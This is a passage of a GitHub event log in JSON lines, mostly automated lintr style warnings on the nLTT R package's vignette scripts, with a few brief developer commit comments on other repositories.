^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:25:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L25) *style:* **lines should not be more than 80 characters.**\n```r\n​stretch_matrix <- nLTT::stretch_nltt_matrix(nltt, dt = 0.25, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:28:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L28) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:30:27:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L30) *style:* **Put spaces around all infix operators.**\n```r\n​points(nltt, pch = 19, col=\"red\")\n                         ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:31:37:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​points(stretch_matrix, pch = 19, col=\"blue\")\n                                   ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:33:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L33) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:37:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L37) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:39:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L39) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:42:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L42) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:46:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L46) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:48:27:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​points(nltt, pch = 19, col=\"red\")\n                         ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:50:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L50) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:52:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L52) *style:* **lines should not be more than 80 characters.**\n```r\n​stretch_matrix <- nLTT::stretch_nltt_matrix(nltt, dt = 0.25, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:55:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L55) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:57:27:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​points(nltt, pch = 19, col=\"red\")\n                         ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:58:37:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L58) *style:* **Put spaces around all infix operators.**\n```r\n​points(stretch_matrix, pch = 19, col=\"blue\")\n                                   ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:60:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L60) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:61:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L61) *style:* **lines should not be more than 80 characters.**\n```r\n​newick <- \"((((XD:1,ZD:1):1,CE:2):1,(FE:2,EE:2):1):4,((AE:1,BE:1):1,(WD:1,YD:1):1):5);\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:64:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L64) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:66:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L66) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:69:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L69) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:73:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L73) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:75:27:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​points(nltt, pch = 19, col=\"red\")\n                         ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:77:2:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L77) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:80:1:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L80) *style:* **lines should not be more than 80 characters.**\n```r\n​stretch_matrix <- nLTT::stretch_nltt_matrix(nltt, dt = 0.05, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:81:27:](https://github.com/richelbilderbeek/nLTT/blob/92b95883cc96a1b3e32d5dde97d57e4334b73707/inst/doc/vignette_stretch_nltt_matrix.R#L81) *style:* **Put spaces around all infix operators.**\n```r\n​points(nltt, pch = 19, col=\"red\")\n                         ~^~\n```\n"}},"created_at":"2016-09-14T09:14:31Z"}
{"id":"4560768443","type":"CommitCommentEvent","actor":{"login":"mcgi5sr2"},"repo":{"name":"SonyAosp/vendor_google"},"payload":{"comment":{"id":19014976,"position":null,"line":null,"path":null,"commit_id":"7e93bea2c516d1359dd883debf478f0d30103837","created_at":"2016-09-14T09:14:37Z","updated_at":"2016-09-14T09:14:37Z","body":"yes thanks, will start tracking there repos too"}},"created_at":"2016-09-14T09:14:37Z"}
{"id":"4560773963","type":"CommitCommentEvent","actor":{"login":"alviteri"},"repo":{"name":"SonyAosp/vendor_google"},"payload":{"comment":{"id":19014987,"position":null,"line":null,"path":null,"commit_id":"7e93bea2c516d1359dd883debf478f0d30103837","created_at":"2016-09-14T09:15:46Z","updated_at":"2016-09-14T09:15:46Z","body":"Since our manifest ... Is tracking all stuff needed ... I think you don't need track it "}},"created_at":"2016-09-14T09:15:46Z"}
{"id":"4560774608","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":19014990,"position":35,"line":35,"path":"hservice/server.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-14T09:15:53Z","updated_at":"2016-09-14T09:15:53Z","body":"sounds good"}},"created_at":"2016-09-14T09:15:53Z"}
{"id":"4560774838","type":"CommitCommentEvent","actor":{"login":"bukka"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":19014991,"position":13,"line":87,"path":"NEWS","commit_id":"acc574d76b60d23b48f8fa561084eb859c2e0766","created_at":"2016-09-14T09:15:55Z","updated_at":"2016-09-14T09:15:55Z","body":"Aren't these already in 7.0 NEWS? If so, why do you add them to 7.1? I thought that we add a news info to the lowest branch only..?"}},"created_at":"2016-09-14T09:15:55Z"}
{"id":"4560778325","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19014997,"position":null,"line":null,"path":null,"commit_id":"ca9b901a79e95041d44b12fb22f96793259952f6","created_at":"2016-09-14T09:16:37Z","updated_at":"2016-09-14T09:16:37Z","body":"[inst/doc/trees_with_root_edge.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/trees_with_root_edge.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:6:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/trees_with_root_edge.R#L6) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:10:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/trees_with_root_edge.R#L10) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 3, fig.height = 3---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:14:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/trees_with_root_edge.R#L14) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 3, fig.height = 3---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:18:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/trees_with_root_edge.R#L18) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 7, fig.height = 7---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:22:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/trees_with_root_edge.R#L22) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:25:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/trees_with_root_edge.R#L25) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:27:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/trees_with_root_edge.R#L27) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_get_average_nltt.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_average_nltt.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:3:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_average_nltt.R#L3) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:9:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_average_nltt.R#L9) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:13:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_average_nltt.R#L13) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:16:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_average_nltt.R#L16) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_average_nltt.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:23:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_average_nltt.R#L23) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:26:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_average_nltt.R#L26) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:29:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_average_nltt.R#L29) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:36:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_average_nltt.R#L36) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:38:47:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_average_nltt.R#L38) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nLTT::get_phylogeny_nltt_matrix(phylogeny2), \n                                              ^\n```\n[inst/doc/vignette_get_average_nltt.R:43:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_average_nltt.R#L43) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:46:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_average_nltt.R#L46) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:49:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_average_nltt.R#L49) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:57:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_average_nltt.R#L57) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:61:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_average_nltt.R#L61) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:64:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_average_nltt.R#L64) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:67:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_average_nltt.R#L67) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:71:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_average_nltt.R#L71) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:74:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_average_nltt.R#L74) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:77:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_average_nltt.R#L77) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:84:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_average_nltt.R#L84) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:86:47:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_average_nltt.R#L86) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nLTT::get_phylogeny_nltt_matrix(phylogeny2), \n                                              ^\n```\n[inst/doc/vignette_get_average_nltt.R:91:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_average_nltt.R#L91) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:94:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_average_nltt.R#L94) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:96:29:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_average_nltt.R#L96) *style:* **Trailing whitespace is superfluous.**\n```r\n​  c(phylogeny1, phylogeny2), \n                            ^\n```\n[inst/doc/vignette_get_average_nltt.R:100:1:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_average_nltt.R#L100) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_get_nltt_values.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:8:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L8) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:15:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L15) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:22:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L22) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:26:2:](https://github.com/richelbilderbeek/nLTT/blob/ca9b901a79e95041d44b12fb22f96793259952f6/inst/doc/vignette_get_nltt_values.R#L26) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n 